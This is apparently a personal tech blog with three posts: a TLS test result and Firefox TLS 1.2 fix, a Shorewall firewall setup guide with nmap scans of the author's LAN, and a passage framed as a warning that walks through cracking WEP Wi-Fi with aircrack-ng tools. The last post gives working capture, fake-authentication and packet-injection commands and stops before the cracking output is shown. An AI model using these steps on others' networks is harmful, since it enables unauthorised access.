Qualys SSL Labs Test results for AndrzejL.no-ip.org and Firefox TLSv1.2 fix.

Hi there.

I have been motivated by a new colleague to enable Forward Secrecy for WoTW WWW server. I did it. I have also tested the website on the Qualys SSL Labs website. Here are the results.

Qualys SSL Labs test results

As You can see I got quite high scores. I have failed only because the SSL Certificate was not trusted. I cannot get other certificate for no-ip domain simply because I do not own no-ip domain but only a subdomain. Plus in the times of Snowden’s revelations who really trusts Certificate Authorities when governments can force any CA to give up their master keys or to create valid certificate so they can snoop on SSL connections “test” something… Also I have decided (sometime ago) to disable all protocols but TLSv1.2. The SSL Labs test results say that this site will fail with many clients / browsers because of that… To this I say update / fix Your browsers people. I don’t care for browsers that cannot work with latest / greatest crypto. I don’t have to be compatible with older browsers. I would prefer to force people to use the latest / most secure protocols / browsers that work with them then allow compatibility between older browsers and my server by lowering crypto standards for my server.

Unfortunately I have noticed that Firefox has a problem with TLSv1.2 and since its my browser of choice I have investigated it. Here is a fix:

a) open browser
b) paste this into the address bar:

about:config?filter=security.tls.version.max

c) find variable

 

security.tls.version.max

 

 

d) double click on it
e) change its default value to:

 

3

 

 

f) close and re-open browser

There – fixed. Mozilla finally got their act together – upgrade Your browser to version 27 (or newer). There… now Your Firefox can work with latest TLS version…

For those that want to know more here is the link. For those that will be complaining about the compatibility with older websites I say this – IF the server does not provides TLSv1.2 then why bother providing https at all? Those servers are outdated and/or badly configured. None of these is good for security.

And another thing… Bank of Ireland had weaker scores then my site and provides no Forward Secrecy…

Bank Of Ireland Qualys SSL Labs Test Results

Of course they got A grade. Their cert is valid.

Cheers.

Andrzej

Configuring shorewall for LAN ipv4 connection.

Hi folks.

What is shorewall? Well this is not a Wikipedia so I won’t go into the details. Suffice to say it’s a firewall. I must underline here that I am in no way expert on security subject neither am I a firewall expert. I am posting this info for my own use as those settings have served me well (unlike my memory) in the past and I would like to re-use them in the future without struggling to remember – but if You want to use them (and maybe later improve them to suite Your needs) then go ahead – feel free to do so just be aware that I am taking no responsibility whatsoever for the security of Your machine and consequences of it getting hacked. I hereby confirm that this config is what I use at home and that it’s safe and secure to my best of knowledge.

Here it goes:

1) First install the shorewall

su

give it root’s password

pacman -S shorewall

resolving dependencies…
looking for inter-conflicts…

Packages (1): shorewall-4.5.19-1

Total Installed Size: 2.23 MiB

:: Proceed with installation? [Y/n] y
(1/1) checking keys in keyring [###############################################] 100%
(1/1) checking package integrity [###############################################] 100%
(1/1) loading package files [###############################################] 100%
(1/1) checking for file conflicts [###############################################] 100%
(1/1) checking available disk space [###############################################] 100%
(1/1) installing shorewall [###############################################] 100%

2) Enable shorewall at boot time.

systemctl enable shorewall

You should see this as an output:

ln -s ‘/usr/lib/systemd/system/shorewall.service’ ‘/etc/systemd/system/multi-user.target.wants/shorewall.service’

3) Find out what network interfaces do You have:

ip link

1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN mode DEFAULT
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
2: wlan0: <BROADCAST,MULTICAST> mtu 1500 qdisc noop state DOWN mode DEFAULT qlen 1000
link/ether 00:1e:52:7a:46:5d brd ff:ff:ff:ff:ff:ff
3: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UNKNOWN mode DEFAULT qlen 1000
link/ether 00:0a:e4:f6:d4:8f brd ff:ff:ff:ff:ff:ff

4) Check what ports are open on the machine before shorewall gets configured and started (optional) by scanning it from another machine using nmap. wishmacer is using 192.168.0.100 ip addy and I am scanning it from another local machine icsserver which is using 192.168.0.1 ip addy:

date && nmap -p 0-65535 192.168.0.100 && date

Hint: You will be able to see the ETA if You press space durring the scan.

Sat Aug 10 17:04:03 IST 2013

Starting Nmap 6.40 ( http://nmap.org ) at 2013-08-10 17:04 IST
Stats: 0:00:01 elapsed; 0 hosts completed (0 up), 1 undergoing ARP Ping Scan
Parallel DNS resolution of 1 host. Timing: About 0.00% done
Stats: 0:00:13 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 4.46% done; ETC: 17:41 (0:00:21 remaining)
Nmap scan report for 192.168.0.100
Host is up (0.00014s latency).
Not shown: 65534 closed ports
PORT STATE SERVICE
7634/tcp open hddtemp
50505/tcp open unknown
MAC Address: 00:0A:E4:F6:D4:8F (Wistron)

Nmap done: 1 IP address (1 host up) scanned in 16.37 seconds
Sat Aug 10 17:04:20 IST 2013

It took 16.5 seconds roughly to scan all the 65536 ports and it discovered 2 open tcp ports 7634 and 50505.

5) Configure shorewall accordingly:

To configure shorewall You will use Your favorite text editor (vi, mcedit, nano etc. whatever ails You) as root. Config files are stored in the folder:

/etc/shorewall

A) /etc/shorewall/shorewall.conf

Find and change values:

STARTUP_ENABLED=No

AUTOMAKE=No

BLACKLIST="NEW,INVALID,UNTRACKED"

from

No

to

Yes

and from

"NEW,INVALID,UNTRACKED"

to

ALL

So they look like this:

STARTUP_ENABLED=Yes

AUTOMAKE=Yes

BLACKLIST=ALL

Now check if your shorewall.conf contains an entry (if you have the latest version of shorewall from ArchLinux repository and you’ve merged your .pacnew file it will):

WORKAROUND=Yes

and if it does – change it to:

WORKAROUND=No

Why? Workarounds are needed for non-modern distros like Debian or CentOS. ArchLinux does not need them.

B) /etc/shorewall/zones

Add these 2 lines at the end of the file:

net ipv4
#LAST LINE - ADD YOUR ENTRIES ABOVE THIS ONE - DO NOT REMOVE

so it looks like this:

#
# Shorewall version 4 – Zones File
#
# For information about this file, type “man shorewall-zones”
#
# The manpage is also online at
# http://www.shorewall.net/manpages/shorewall-zones.html
#
##################################
#ZONE TYPE OPTIONS IN OUT
# OPTIONS OPTIONS
fw firewall
net ipv4
#LAST LINE – ADD YOUR ENTRIES ABOVE THIS ONE – DO NOT REMOVE

C) /etc/shorewall/interfaces

Here You will use the info gathered in point 4. So in my case network interfaces are eth0 and wlan0 – wireless network is not used at the moment (but we will define it anyway) and the interface eth0 is connected to my router.

Add these 3 lines at the end of the file:

net eth0 -
net wlan0 -
#LAST LINE -- DO NOT REMOVE

so it looks like this:

#
# Shorewall version 4 – Interfaces File
#
# For information about entries in this file, type “man shorewall-interfaces”
#
# The manpage is also online at
# http://www.shorewall.net/manpages/shorewall-interfaces.html
#
##################################
FORMAT 2
##################################
#ZONE INTERFACE OPTIONS
net eth0 –
net wlan0 –
#LAST LINE — DO NOT REMOVE

D) /etc/shorewall/policy

Add these 4 lines to the end of the file:

fw net ACCEPT
net all DROP info
all all DROP info
#LAST LINE -- DO NOT REMOVE

so it looks like this:

#
# Shorewall version 4 – Policy File
#
# For information about entries in this file, type “man shorewall-policy”
#
# The manpage is also online at
# http://www.shorewall.net/manpages/shorewall-policy.html
#
##################################
#SOURCE DEST POLICY LOG LIMIT: CONNLIMIT:
# LEVEL BURST MASK
fw net ACCEPT
net all DROP info
all all DROP info
#LAST LINE — DO NOT REMOVE

6) Start shorewall:

systemctl start shorewall

7) Check it’s status:

journalctl -xn

— Logs begin at Fri 2013-08-09 23:23:46 IST, end at Sat 2013-08-10 17:01:44 IST. —
Aug 10 17:01:43 wishmacer.loc shorewall[2069]: Setting up Martian Logging…
Aug 10 17:01:43 wishmacer.loc shorewall[2069]: Setting up Proxy ARP…
Aug 10 17:01:43 wishmacer.loc shorewall[2069]: Preparing iptables-restore input…
Aug 10 17:01:43 wishmacer.loc shorewall[2069]: Running /sbin/iptables-restore…
Aug 10 17:01:44 wishmacer.loc shorewall[2069]: IPv4 Forwarding Enabled
Aug 10 17:01:44 wishmacer.loc shorewall[2069]: Processing /etc/shorewall/start …
Aug 10 17:01:44 wishmacer.loc shorewall[2069]: Processing /etc/shorewall/started …
Aug 10 17:01:44 wishmacer.loc logger[2279]: Shorewall started
Aug 10 17:01:44 wishmacer.loc shorewall[2069]: done.
Aug 10 17:01:44 wishmacer.loc systemd[1]: Started Shorewall IPv4 firewall.
— Subject: Unit shorewall.service has finished start-up
— Defined-By: systemd
— Support: http://lists.freedesktop.org/mailman/listinfo/systemd-devel

— Unit shorewall.service has finished starting up.

— The start-up result is done.

systemctl status shorewall

shorewall.service – Shorewall IPv4 firewall
Loaded: loaded (/usr/lib/systemd/system/shorewall.service; enabled)
Active: active (exited) since Sat 2013-08-10 17:01:44 IST; 2min 57s ago
Process: 2069 ExecStart=/usr/bin/shorewall $OPTIONS start (code=exited, status=0/SUCCESS)

Aug 10 17:01:42 wishmacer.loc systemd[1]: Starting Shorewall IPv4 firewall…
Aug 10 17:01:42 wishmacer.loc shorewall[2069]: Compiling…
Aug 10 17:01:42 wishmacer.loc shorewall[2069]: perl: warning: Setting locale failed.
Aug 10 17:01:42 wishmacer.loc shorewall[2069]: perl: warning: Please check that your locale settings:
Aug 10 17:01:42 wishmacer.loc shorewall[2069]: LANGUAGE = (unset),
Aug 10 17:01:42 wishmacer.loc shorewall[2069]: LC_ALL = (unset),
Aug 10 17:01:42 wishmacer.loc shorewall[2069]: LANG = “en_UK.UTF-8”
Aug 10 17:01:42 wishmacer.loc shorewall[2069]: are supported and installed on your system.
Aug 10 17:01:42 wishmacer.loc shorewall[2069]: perl: warning: Falling back to the standard locale (“C”).
Aug 10 17:01:42 wishmacer.loc shorewall[2069]: Processing /etc/shorewall/params …
Aug 10 17:01:42 wishmacer.loc shorewall[2069]: Processing /etc/shorewall/shorewall.conf…
Aug 10 17:01:42 wishmacer.loc shorewall[2069]: Loading Modules…
Aug 10 17:01:43 wishmacer.loc shorewall[2069]: Compiling /etc/shorewall/zones…
Aug 10 17:01:43 wishmacer.loc shorewall[2069]: Compiling /etc/shorewall/interfaces…
Aug 10 17:01:43 wishmacer.loc shorewall[2069]: Determining Hosts in Zones…
Aug 10 17:01:43 wishmacer.loc shorewall[2069]: Locating Action Files…
Aug 10 17:01:43 wishmacer.loc shorewall[2069]: Compiling /etc/shorewall/policy…
Aug 10 17:01:43 wishmacer.loc shorewall[2069]: Running /etc/shorewall/initdone…
Aug 10 17:01:43 wishmacer.loc shorewall[2069]: Compiling Kernel Route Filtering…
Aug 10 17:01:43 wishmacer.loc shorewall[2069]: Compiling Martian Logging…
Aug 10 17:01:43 wishmacer.loc shorewall[2069]: Compiling MAC Filtration — Phase 1…
Aug 10 17:01:43 wishmacer.loc shorewall[2069]: Compiling /etc/shorewall/rules…
Aug 10 17:01:43 wishmacer.loc shorewall[2069]: Compiling /etc/shorewall/conntrack…
Aug 10 17:01:43 wishmacer.loc shorewall[2069]: Compiling MAC Filtration — Phase 2…
Aug 10 17:01:43 wishmacer.loc shorewall[2069]: Applying Policies…
Aug 10 17:01:43 wishmacer.loc shorewall[2069]: Compiling /usr/share/shorewall/action.Drop for chain Drop…
Aug 10 17:01:43 wishmacer.loc shorewall[2069]: Compiling /usr/share/shorewall/action.Broadcast for chain Broadcast…
Aug 10 17:01:43 wishmacer.loc shorewall[2069]: Generating Rule Matrix…
Aug 10 17:01:43 wishmacer.loc shorewall[2069]: Compiling /usr/share/shorewall/action.Reject for chain Reject…
Aug 10 17:01:43 wishmacer.loc shorewall[2069]: Creating iptables-restore input…
Aug 10 17:01:43 wishmacer.loc shorewall[2069]: Shorewall configuration compiled to /var/lib/shorewall/.start
Aug 10 17:01:43 wishmacer.loc shorewall[2069]: Starting Shorewall….
Aug 10 17:01:43 wishmacer.loc shorewall[2069]: Initializing…
Aug 10 17:01:43 wishmacer.loc shorewall[2069]: Processing /etc/shorewall/init …
Aug 10 17:01:43 wishmacer.loc shorewall[2069]: Processing /etc/shorewall/tcclear …
Aug 10 17:01:43 wishmacer.loc shorewall[2069]: Setting up Route Filtering…
Aug 10 17:01:43 wishmacer.loc shorewall[2069]: Setting up Martian Logging…
Aug 10 17:01:43 wishmacer.loc shorewall[2069]: Setting up Proxy ARP…
Aug 10 17:01:43 wishmacer.loc shorewall[2069]: Preparing iptables-restore input…
Aug 10 17:01:43 wishmacer.loc shorewall[2069]: Running /sbin/iptables-restore…
Aug 10 17:01:44 wishmacer.loc shorewall[2069]: IPv4 Forwarding Enabled
Aug 10 17:01:44 wishmacer.loc shorewall[2069]: Processing /etc/shorewall/start …
Aug 10 17:01:44 wishmacer.loc shorewall[2069]: Processing /etc/shorewall/started …
Aug 10 17:01:44 wishmacer.loc logger[2279]: Shorewall started
Aug 10 17:01:44 wishmacer.loc shorewall[2069]: done.
Aug 10 17:01:44 wishmacer.loc systemd[1]: Started Shorewall IPv4 firewall.

8) Check if its working as expected (optional) and scan it from another machine using nmap. wishmacer is using 192.168.0.100 ip addy and I am scanning it from another local machine icsserver which is using 192.168.0.1 ip addy:

Hint: You will be able to see the ETA if You press space during the scan.

date && nmap -p 0-65535 192.168.0.100 && date

Sat Aug 10 17:14:00 IST 2013

Starting Nmap 6.40 ( http://nmap.org ) at 2013-08-10 17:14 IST
Stats: 0:10:22 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 46.31% done; ETC: 17:36 (0:11:46 remaining)
Stats: 0:21:33 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 97.43% done; ETC: 17:36 (0:00:34 remaining)
Nmap scan report for 192.168.0.100
Host is up (0.00016s latency).
All 65536 scanned ports on 192.168.0.100 are filtered
MAC Address: 00:0A:E4:F6:D4:8F (Wistron)

Nmap done: 1 IP address (1 host up) scanned in 1327.34 seconds
Sat Aug 10 17:36:07 IST 2013

It took 22 minutes roughly to scan all the 65536 ports. All of them are closed / filtered.

9) Add Your custom rules. For example on Wishmacer / 192.168.0.100 I have a service running at tcp port 50505. I want to open it.

Modify this file:

/etc/shorewall/rules

by adding those 2 lines:

ACCEPT net fw tcp 50505 -
#LAST LINE -- DO NOT REMOVE

so it looks like this:

#
# Shorewall version 4 – Rules File
#
# For information on the settings in this file, type “man shorewall-rules”
#
# The manpage is also online at
# http://www.shorewall.net/manpages/shorewall-rules.html
#
##################################
#ACTION SOURCE DEST PROTO DEST SOURCE ORIGINAL RATE USER/ MARK CONNLIMIT TIME HEADERS SWITCH HELPER
# PORT PORT(S) DEST LIMIT GROUP
?SECTION ALL
?SECTION ESTABLISHED
?SECTION RELATED
?SECTION INVALID
?SECTION UNTRACKED
?SECTION NEW
# Allow access to port 50505 TCP – SSHD
ACCEPT net fw tcp 50505 –
#LAST LINE — DO NOT REMOVE

and restart Your firewall using this command:

systemctl restart shorewall

and test if it worked from a different machine:

date && nmap -p 7634 192.168.0.100 && date

Sat Aug 10 17:48:25 IST 2013

Starting Nmap 6.40 ( http://nmap.org ) at 2013-08-10 17:48 IST
Nmap scan report for 192.168.0.100
Host is up (0.00016s latency).
PORT STATE SERVICE
7634/tcp filtered hddtemp
MAC Address: 00:0A:E4:F6:D4:8F (Wistron)

Nmap done: 1 IP address (1 host up) scanned in 13.41 seconds
Sat Aug 10 17:48:38 IST 2013

date && nmap -p 50505 192.168.0.100 && date

Sat Aug 10 17:48:45 IST 2013

Starting Nmap 6.40 ( http://nmap.org ) at 2013-08-10 17:48 IST
Nmap scan report for 192.168.0.100
Host is up (0.00019s latency).
PORT STATE SERVICE
50505/tcp open unknown
MAC Address: 00:0A:E4:F6:D4:8F (Wistron)

Nmap done: 1 IP address (1 host up) scanned in 13.25 seconds
Sat Aug 10 17:48:59 IST 2013

As You can see port 7634 which was previously (before shorewall configuration / start) open is now marked as filtered and the 50505 which I chose to open on my firewall is now open and ready to use.

Now You can add more lines in this configuration file. Different ports, different protocols, different rules.

Example if You want to add port 123 udp as open add this line:

ACCEPT net fw udp 123 -

so it looks like this:

#
# Shorewall version 4 – Rules File
#
# For information on the settings in this file, type “man shorewall-rules”
#
# The manpage is also online at
# http://www.shorewall.net/manpages/shorewall-rules.html
#
##################################
#ACTION SOURCE DEST PROTO DEST SOURCE ORIGINAL RATE USER/ MARK CONNLIMIT TIME HEADERS SWITCH HELPER
# PORT PORT(S) DEST LIMIT GROUP
#SECTION ALL
#SECTION ESTABLISHED
#SECTION RELATED
#SECTION INVALID
#SECTION UNTRACKED
SECTION NEW
ACCEPT net fw udp 123 –
ACCEPT net fw tcp 50505 –
#LAST LINE — DO NOT REMOVE

save the file and restart firewall as You did before.

And what if I want to open a large range of ports? Lets say… I want to open 250 TCP ports starting at 5000?

No problem – add another rule that looks like this:

ACCEPT net fw tcp 5000:5250 -

so it looks like this:

#
# Shorewall version 4 – Rules File
#
# For information on the settings in this file, type “man shorewall-rules”
#
# The manpage is also online at
# http://www.shorewall.net/manpages/shorewall-rules.html
#
##################################
#ACTION SOURCE DEST PROTO DEST SOURCE ORIGINAL RATE USER/ MARK CONNLIMIT TIME HEADERS SWITCH HELPER
# PORT PORT(S) DEST LIMIT GROUP
#SECTION ALL
#SECTION ESTABLISHED
#SECTION RELATED
#SECTION INVALID
#SECTION UNTRACKED
SECTION NEW
ACCEPT net fw udp 123 –
ACCEPT net fw tcp 5000:5250 –
ACCEPT net fw tcp 50505 –
#LAST LINE — DO NOT REMOVE

save the file and restart firewall as You did before.

Ok Andy… I have a problem… I cannot ping the machine anymore after the shorewall was started…

Ok… I am guessing You want the machine to respond to ping for whatever the reason.

Add this as a rule:

Ping(ACCEPT) net fw

so it looks like this:

#
# Shorewall version 4 – Rules File
#
# For information on the settings in this file, type “man shorewall-rules”
#
# The manpage is also online at
# http://www.shorewall.net/manpages/shorewall-rules.html
#
##################################
#ACTION SOURCE DEST PROTO DEST SOURCE ORIGINAL RATE USER/ MARK CONNLIMIT TIME HEADERS SWITCH HELPER
# PORT PORT(S) DEST LIMIT GROUP
#SECTION ALL
#SECTION ESTABLISHED
#SECTION RELATED
#SECTION INVALID
#SECTION UNTRACKED
SECTION NEW
Ping(ACCEPT) net fw
ACCEPT net fw udp 123 –
ACCEPT net fw tcp 5000:5250 –
ACCEPT net fw tcp 50505 –
#LAST LINE — DO NOT REMOVE

save the file and restart firewall as You did before.

If You want to block a pest (lets assume IP 1.2.3.4) that is messing with Your server add this line:

DROP net:1.2.3.4 all

so it looks like this:

#
# Shorewall version 4 – Rules File
#
# For information on the settings in this file, type “man shorewall-rules”
#
# The manpage is also online at
# http://www.shorewall.net/manpages/shorewall-rules.html
#
##################################
#ACTION SOURCE DEST PROTO DEST SOURCE ORIGINAL RATE USER/ MARK CONNLIMIT TIME HEADERS SWITCH HELPER
# PORT PORT(S) DEST LIMIT GROUP
#SECTION ALL
#SECTION ESTABLISHED
#SECTION RELATED
#SECTION INVALID
#SECTION UNTRACKED
SECTION NEW
DROP net:1.2.3.4 all
Ping(ACCEPT) net fw
ACCEPT net fw udp 123 –
ACCEPT net fw tcp 5000:5250 –
ACCEPT net fw tcp 50505 –
#LAST LINE — DO NOT REMOVE

save the file and restart firewall as You did before.

If the pest is using a dynamic IP and You know the range (lets assume IP 2.*.*.*) then add this line:

DROP net:2.0.0.0/24 all

so it looks like this:

#
# Shorewall version 4 – Rules File
#
# For information on the settings in this file, type “man shorewall-rules”
#
# The manpage is also online at
# http://www.shorewall.net/manpages/shorewall-rules.html
#
##################################
#ACTION SOURCE DEST PROTO DEST SOURCE ORIGINAL RATE USER/ MARK CONNLIMIT TIME HEADERS SWITCH HELPER
# PORT PORT(S) DEST LIMIT GROUP
#SECTION ALL
#SECTION ESTABLISHED
#SECTION RELATED
#SECTION INVALID
#SECTION UNTRACKED
SECTION NEW
DROP net:1.2.3.4 all
DROP net:2.0.0.0/24 all
Ping(ACCEPT) net fw
ACCEPT net fw udp 123 –
ACCEPT net fw tcp 5000:5250 –
ACCEPT net fw tcp 50505 –
#LAST LINE — DO NOT REMOVE

save the file and restart firewall as You did before.

It’s very important that You place the DROP lines before the ACCEPT lines.

If You want to forward a port (destination nat) to another IP / machine add a rule that will do it for You. Example:

I have 2 NICs in my machine.

– First has IP 192.168.1.50 and is defined as a wan zone.
– Second has IP 192.168.0.1 and is recognized by shorewall as a net zone.

There is another machine in my net zone. The machine’s IP is 192.168.0.100.

I want to forward port 4000 (both TCP and UDP) from the wan zone – IP 192.168.1.50 to the port 4000 on the net zone machine with the IP 192.168.0.100. This means that if any packet will land on the port 4000 on the 192.168.1.50 machine it will be redirected (forwarded / dnated) to the port 4000 on the 192.168.0.100 machine.

The rule will look like this:

DNAT wan net:192.168.0.100 tcp 4000 - 192.168.1.50
DNAT wan net:192.168.0.100 udp 4000 - 192.168.1.50

and the rules file will look like this:

#
# Shorewall version 4 – Rules File
#
# For information on the settings in this file, type “man shorewall-rules”
#
# The manpage is also online at
# http://www.shorewall.net/manpages/shorewall-rules.html
#
##################################
#ACTION SOURCE DEST PROTO DEST SOURCE ORIGINAL RATE USER/ MARK CONNLIMIT TIME HEADERS SWITCH HELPER
# PORT PORT(S) DEST LIMIT GROUP
#SECTION ALL
#SECTION ESTABLISHED
#SECTION RELATED
#SECTION INVALID
#SECTION UNTRACKED
SECTION NEW
DROP net:1.2.3.4 all
DROP net:2.0.0.0/24 all
Ping(ACCEPT) net fw
ACCEPT net fw udp 123 –
ACCEPT net fw tcp 5000:5250 –
ACCEPT net fw tcp 50505 –
DNAT wan net:192.168.0.100 tcp 4000 – 192.168.1.50
DNAT wan net:192.168.0.100 udp 4000 – 192.168.1.50
#LAST LINE — DO NOT REMOVE

save the file and restart firewall as You did before. Make sure that the port 4000 (both TPC and UDP) is open on the 192.168.0.100 machine. How?

su -c "nmap -Pn -p 4000 192.168.0.100 && nmap -sU -Pn -p 4000 192.168.0.100"

Starting Nmap 6.47 ( http://nmap.org ) at 2014-12-09 18:43 GMT
Nmap scan report for wishmasus.loc (192.168.0.100)
Host is up (0.00012s latency).
PORT STATE SERVICE
4000/tcp open remoteanything

Nmap done: 1 IP address (1 host up) scanned in 0.35 seconds

Starting Nmap 6.47 ( http://nmap.org ) at 2014-12-09 18:43 GMT
Nmap scan report for wishmasus.loc (192.168.0.100)
Host is up.
PORT STATE SERVICE
4000/udp open|filtered icq

Nmap done: 1 IP address (1 host up) scanned in 2.13 seconds

The situation will look slightly different if the destination port and source port number are different. The scenario described above still applies. 2 NICs, wan and net zones, another machine in the net zone.

I want to forward port 6118 (both TCP and UDP) from the wan zone – IP 192.168.1.50 to the port 6112 on the net zone machine with the IP 192.168.0.100. This means that if any packet will land on the port 6118 on the 192.168.1.50 machine it will be redirected (forwarded / dnated) to the port 6112 on the 192.168.0.100 machine.

The rule will look like this:

DNAT wan net:192.168.0.100:6112 tcp 6118 - 192.168.1.50
DNAT wan net:192.168.0.100:6112 udp 6118 - 192.168.1.50

and the rules file will look like this:

#
# Shorewall version 4 – Rules File
#
# For information on the settings in this file, type “man shorewall-rules”
#
# The manpage is also online at
# http://www.shorewall.net/manpages/shorewall-rules.html
#
##################################
#ACTION SOURCE DEST PROTO DEST SOURCE ORIGINAL RATE USER/ MARK CONNLIMIT TIME HEADERS SWITCH HELPER
# PORT PORT(S) DEST LIMIT GROUP
#SECTION ALL
#SECTION ESTABLISHED
#SECTION RELATED
#SECTION INVALID
#SECTION UNTRACKED
SECTION NEW
DROP net:1.2.3.4 all
DROP net:2.0.0.0/24 all
Ping(ACCEPT) net fw
ACCEPT net fw udp 123 –
ACCEPT net fw tcp 5000:5250 –
ACCEPT net fw tcp 50505 –
DNAT wan net:192.168.0.100 tcp 4000 – 192.168.1.50
DNAT wan net:192.168.0.100 udp 4000 – 192.168.1.50
DNAT wan net:192.168.0.100:6112 tcp 6118 – 192.168.1.50
DNAT wan net:192.168.0.100:6112 udp 6118 – 192.168.1.50
#LAST LINE — DO NOT REMOVE

save the file and restart firewall as You did before. Make sure that the port 6112 (both TPC and UDP) is open on the 192.168.0.100 machine. How?

su -c "nmap -Pn -p 6112 192.168.0.100 && nmap -sU -Pn -p 6112 192.168.0.100"

Starting Nmap 6.47 ( http://nmap.org ) at 2014-12-09 18:43 GMT
Nmap scan report for wishmasus.loc (192.168.0.100)
Host is up (0.00012s latency).
PORT STATE SERVICE
6112/tcp open dtspc

Nmap done: 1 IP address (1 host up) scanned in 0.35 seconds

Starting Nmap 6.47 ( http://nmap.org ) at 2014-12-09 18:43 GMT
Nmap scan report for wishmasus.loc (192.168.0.100)
Host is up.
PORT STATE SERVICE
6112/udp open|filtered unknown

Nmap done: 1 IP address (1 host up) scanned in 2.13 seconds

That’s it – You have just configured shorewall to Your liking.

Hint: Think of a firewall as of a naughty kid – if You will allow him to do something and then deny it – You know he will still do it… In other words the order of the rules / policies does matters. Deny first and ask questions later ;).

Hint: IF You are forwarding the port from machine 1 to machine 2 there is no need to open the port on the machine 1. DNAT rule will take care of that for You. You need to however make sure that the port is open on the machine 2. IF its not – check if the application that was suppose to open the port is running and IF You are running shorewall on the machine 2 as well make sure that the appropriate rule was added in the the machine 2 shorewall rule file.

Hint: Do not scan the ports from the same machine that You have configured firewall on – it will be considered as a local scan and firewall will not block ports.

Hint: IF You will run into a problem during the setup and firewall won’t start or restart use this command:

journalctl -xn

and read it’s output thoroughly. The answer to Your trouble is there.

Hint: If You want to test if shorewall is causing You trouble (blocks some port that You want to connect to) run:

systemctl stop shorewall && shorewall clear

This will stop the firewall and clear all it’s rules. IF after You did this You still cannot connect to the port on Your machine and it says its filtered or closed – look for a reason somewhere else…

Regards.

Andrzej

P.S. Breaking news… Someone actually reads this… This post has been translated (not very exactly I must say) to Polish by Wilczek. You can find it here.

Cracking WEP by AndrzejL aka one of the reasons why You SHOULD NEVER USE WEP TO SECURE YOUR ROUTER!

I have noticed (while connecting to my own AP) that many people around still use WEP encryption and I just felt dizzy… After I have counted to 10 I have decided to write this up:

Cracking WEP by AndrzejL aka one of the reasons why You SHOULD NEVER USE WEP to secure Your router!

This is NOT a “HOW TO CRACK WEP” tutorial. This is a warning. Warning that should be taken as “WOW! This WEP stuff is really not secure… I better change my router to personal WPA2 right away…”. Please do not use this knowledge to do illegal stuff. I used my own wireless router in my own wireless network for this demonstration. Breaking into WEP secured networks is illegal. You have been warned.

0) Install aircrack-ng-svn from ArchLinux AUR repository:

FIRST WINDOW:

1) Check the name of the wireless interface

iwconfig

says it’s wlan0

2) Check mac address of wlan0

ifconfig wlan0

says YY:YY:YY:YY:YY:YY

3) Optional – not necessary under Backtrack. Kill unnecessary network services that can mess You up:

airmon-ng check kill

Example:

Found 1 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!

PID     Name
23899   ifplugd
Killing all those processes…

4) Create wireless interface in monitor mode:

airmon-ng start wlan0

5) Check the name of the wireless monitor mode interface

iwconfig

says it’s mon0

6) Start sniffing to collect router’s data

airodump-ng mon0

Stop airodump with CTRL + C

Information gathered:

Router’s BSSID: XX:XX:XX:XX:XX:XX
Router’s ESSID: Arch_Linux_User

    INFO: If ESSID contains spaces put it in the “” or ‘ ‘ in next commands ie “Arch Linux User” or ‘Arch Linux User’.

Router’s CHANNEL: ZZ

7) Kill mon0 interface:

airmon-ng stop mon0

8) Start mon0 fixed at the AP’s channel:

airmon-ng start wlan0 ZZ

9) Now re-write Your sniffing command so it sniffs the right channel / bssid and so it saves the captured packets into a file:

airodump-ng -c ZZ --bssid XX:XX:XX:XX:XX:XX -w ./output mon0

    IF You get “Fixed channel mon0: -1” in the right hand corner of the sniffer – then rewrite Your command again by adding –ignore-negative-one so it looks like this:

airodump-ng -c ZZ --bssid XX:XX:XX:XX:XX:XX  --ignore-negative-one -w ./output mon0

    Leave this command running and saving packets.

SECOND WINDOW:

10) Check if the card is capable of packet injection:

aireplay-ng -9 mon0

    16:10:47  Injection is working!

11) Try to auth with router:

aireplay-ng -1 0 -e Arch_Linux_User -a XX:XX:XX:XX:XX:XX -h YY:YY:YY:YY:YY:YY mon0

    if You get this error:

16:20:36 Waiting for beacon frame (XX:XX:XX:XX:XX:XX) on channel -1
15:38:33  Couldn’t determine current channel for mon0, you should either force the operation with –ignore-negative-one or apply a kernel patch.

    just rewrite Your command by adding “–ignore-negative-one” switch.

Example:

aireplay-ng -1 0 -e Arch_Linux_User -a XX:XX:XX:XX:XX:XX -h YY:YY:YY:YY:YY:YY --ignore-negative-one mon0

This command will (should) auth You with a router and then give You the prompt back.

0 – this can take a value between 0 and 512 (experiment)
-e router’s ESSID
-a router’s BSSID
-h Your card’s MAC address
–ignore-negative-one fixes the above mentioned error

IF You want to stop this command use CTRL + C

16:16:28  Waiting for beacon frame (BSSID: XX:XX:XX:XX:XX:XX) on channel -1

16:16:28  Sending Authentication Request (Open System) [ACK]
16:16:28  Authentication successful
16:16:28  Sending Association Request [ACK]
16:16:28  Association successful 🙂 (AID: 1)

🙂 now fiddle with the “0” in the command – change it’s values to something between 1 and 512.

Example:

aireplay-ng -1 1 -e Arch_Linux_User -a XX:XX:XX:XX:XX:XX -h YY:YY:YY:YY:YY:YY --ignore-negative-one mon0

    Leave this command running.

THIRD WINDOW:

12) Start to inject:

aireplay-ng -3 -b XX:XX:XX:XX:XX:XX -h YY:YY:YY:YY:YY:YY mon0

    If You get these errors:

16:21:36  Waiting for beacon frame (BSSID: XX:XX:XX:XX:XX:XX) on channel -1
16:21:36  Couldn’t determine current channel for mon0, you should either force the operation with –ignore-negative-one or apply a kernel patch
Please specify an ESSID (-e).

    rewrite the command by adding “-e Arch_Linux_User” and “–ignore-negative-one” switches.

Example:

aireplay-ng -3 -e Arch_Linux_User -b XX:XX:XX:XX:XX:XX -h YY:YY:YY:YY:YY:YY --ignore-negative-one mon0

Meanwhile You can (but You do not have to) fiddle with the airmon-ng “-1” command in the second window. Change the value of “0” to different values between 1 and 512 – see which is better for You… Sometimes 1 will do juuuust fine.

    After a while You _should_ receive ARP request packet… and… START TO INJECT THEM.

FOURTH WINDOW:

13) When collected some ARP packets You can start the cracking process:

aircrack-ng -z ./output*.cap

and soon after that You should be able to see this sort of message:

